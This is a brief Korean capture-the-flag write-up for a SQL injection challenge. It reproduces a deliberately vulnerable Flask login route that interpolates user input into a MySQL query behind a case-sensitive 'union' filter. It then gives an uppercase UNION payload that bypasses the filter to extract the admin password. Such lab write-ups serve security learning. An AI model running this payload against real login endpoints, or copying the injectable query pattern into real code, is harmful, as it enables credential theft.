[SWLUG] Sqli3 - write up

🐰시작!

이 창이 뜨고 시작함.
소스코드 먼저 열어봤다.

from flask import Flask, request, g
import mysql.connector

app = Flask(__name__)

def get_db():
    if 'db' not in g:
        g.db = mysql.connector.connect(
            host='db',  # Docker Compose 서비스 이름
            user='root',
            password='toor',
            database='sqli'
        )
    return g.db

@app.teardown_appcontext
def close_db(exception):
    db = g.pop('db', None)
    if db is not None:
        db.close()

@app.route('/')
def index():
    uid = request.args.get('uid')
    upw = request.args.get('upw')
    if uid is not None:
        if 'union' in uid:
            return "<h3>No Hack~!~!</h3>"
    if upw is not None:
        if 'union' in upw:
            return "<h3>No Hack~!~!</h3>"

    query = f"SELECT * FROM sqli3 WHERE uid='{uid}' AND upw='{upw}'"
    print(query)  # For debugging

    cur = get_db().cursor()
    try:
        cur.execute(query)
        result = cur.fetchone()
    except mysql.connector.Error as e:
        return f"<h3>Database error: {e}</h3>"

    if result:
        output = f"<h3>Hello! {result[3]}</h3>"
    else:
        output = "<h3>Invalid credentials</h3>"

    return f"""
        <h1>level 3</h1>
        <p><b>Query:</b> {query}</p>
        <p><b>Result:</b> {output}</p>
    """

if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0')

@app.route('/')
def index():
    uid = request.args.get('uid')
    upw = request.args.get('upw')
    if uid is not None:
        if 'union' in uid:
            return "<h3>No Hack~!~!</h3>"
    if upw is not None:
        if 'union' in upw:
            return "<h3>No Hack~!~!</h3>"

이부분을 보면 union 문자를 포함하는 걸 차단하고 있음.
union이 uid나 upw에 포함시 No Hack!!을 반환한다.
그래서 먼저 대문자로 입력해 우회해봄.

시도1)
?uid=' UNION select 1, 2, 3,(select upw from sqli3 where uid='admin' ) # 입력

FLAG획득.